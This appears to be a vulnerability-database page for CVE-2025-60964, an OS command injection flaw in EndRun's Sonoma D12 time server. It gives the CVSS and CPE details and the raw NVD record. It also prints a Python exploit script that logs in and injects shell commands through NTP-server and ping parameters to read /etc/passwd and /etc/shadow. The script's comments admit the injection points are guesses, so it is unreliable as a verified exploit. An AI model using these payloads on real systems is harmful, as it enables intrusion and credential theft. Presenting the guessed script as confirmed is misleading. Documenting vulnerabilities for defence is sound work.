Security Vulnerability Report
中文
CVE-2025-60964 CVSS 9.1 CRITICAL

CVE-2025-60964

Published: 2025-10-06 17:16:07
Last Modified: 2025-10-10 16:14:45

Description

OS Command Injection vulnerability in EndRun Technologies Sonoma D12 Network Time Server (GPS) F/W 6010-0071-000 Ver 4.00 allows attackers to execute arbitrary code, cause a denial of service, gain escalated privileges, gain sensitive information, and possibly other unspecified impacts.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:endruntechnologies:sonoma_d12_firmware:6010-0071-000:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:endruntechnologies:sonoma_d12:4.00:*:*:*:*:*:*:* - NOT VULNERABLE
EndRun Sonoma D12 Network Time Server F/W 6010-0071-000 Ver 4.00

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-60964 - EndRun Sonoma D12 OS Command Injection PoC # Author: xdiv-sec # Description: Demonstrates OS command injection in Sonoma D12 NTP Server # Affected: F/W 6010-0071-000 Ver 4.00 import requests import sys TARGET = "https://target-sonoma-d12.example.com" USERNAME = "admin" PASSWORD = "password" def exploit_command_injection(): """ Exploit OS command injection vulnerability in Sonoma D12 NTP Server. The vulnerability exists in an authenticated endpoint where user-supplied input is passed to a system shell without proper sanitization. """ session = requests.Session() # Step 1: Authenticate to the device management interface login_url = f"{TARGET}/login.cgi" login_data = { "username": USERNAME, "password": PASSWORD } resp = session.post(login_url, data=login_data, verify=False) print(f"[*] Login response status: {resp.status_code}") # Step 2: Inject OS command via vulnerable parameter # The injection point is typically in configuration parameters # that are passed to system() or exec() calls on the backend inject_url = f"{TARGET}/config_ntp.cgi" # Example: injecting command separator to execute arbitrary commands # Original parameter might be hostname or NTP server address payload = { "ntp_server": "pool.ntp.org; id; cat /etc/passwd", "action": "save" } resp = session.post(inject_url, data=payload, verify=False) print(f"[*] Injection response status: {resp.status_code}") # Step 3: Alternative - inject via ping/traceroute diagnostic endpoint diag_url = f"{TARGET}/diag_ping.cgi" diag_payload = { "host": "127.0.0.1; cat /etc/shadow", "count": "4" } resp = session.post(diag_url, data=diag_payload, verify=False) print(f"[*] Diagnostic injection response: {resp.text[:500]}") return resp.text if __name__ == "__main__": print("[+] CVE-2025-60964 PoC - EndRun Sonoma D12 Command Injection") print("[+] WARNING: Use only on systems you are authorized to test") result = exploit_command_injection() print(f"[+] Result:\n{result}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60964", "sourceIdentifier": "[email protected]", "published": "2025-10-06T17:16:07.307", "lastModified": "2025-10-10T16:14:44.910", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OS Command Injection vulnerability in EndRun Technologies Sonoma D12 Network Time Server (GPS) F/W 6010-0071-000 Ver 4.00 allows attackers to execute arbitrary code, cause a denial of service, gain escalated privileges, gain sensitive information, and possibly other unspecified impacts."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:endruntechnologies:sonoma_d12_firmware:6010-0071-000:*:*:*:*:*:*:*", "matchCriteriaId": "6F239BEA-C83D-46D5-A558-478D6F01A27A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:endruntechnologies:sonoma_d12:4.00:*:*:*:*:*:*:*", "matchCriteriaId": "2D229C97-27FA-4DC6-9EB9-7757C6638143"}]}]}], "references": [{"url": "http://endrun.com", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "http://sonoma.com", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://xdiv-sec.github.io/vulnerability-research/advisories/2025-10-03-sonoma-d12", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}